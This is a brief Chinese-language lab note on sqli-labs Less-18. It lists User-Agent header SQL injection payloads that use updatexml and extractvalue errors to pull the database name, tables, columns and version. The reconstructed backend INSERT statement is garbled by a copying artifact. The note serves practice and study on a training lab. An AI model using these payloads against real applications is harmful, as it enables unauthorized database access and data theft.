sqli-labs less18
sqli-labs less 18
reader-l ‘or updatexml(1,concat(’#’,(select user()),1),1)
先用这句话简单的判断后台insert 语句
i n s e r t = " I N S E R T I N T O s e c u r i t y . u a g e n t s ( u a g e n t , i p a d d r e s s , u s e r n a m e ) V A L U E S ( ′ insert="INSERT INTO security.uagents (uagent, ip_address, username) VALUES (' insert="INSERTINTOsecurity.uagents(uagent,ipaddress,username)VALUES(′uagent’, ‘$IP’, $uname)";
所以用以下语句进行注入猜解
user-agent:reader-l ’ or updatexml(1,concat(’#’,(database())),0),’’,’’)#
reader-l ‘or updatexml(1,concat(’#’,(select concat(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1 ),’#’),0),1)#
reader-l ‘or updatexml(1,concat(’#’,(select concat(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1 ),’#’),0),1)#
reader-l ‘or updatexml(1,concat(’#’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 0,1 ),’#’),0),1)#
reader-l ’ or updatexml(1,concat(’#’,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)),0),’’,’’)#
'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and ‘1’ = '1
reader-l 'and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e)) and ‘1’ = '1
有一个大佬讲得很详细,这是他的链接 https://www.jianshu.com/p/7494c1027abf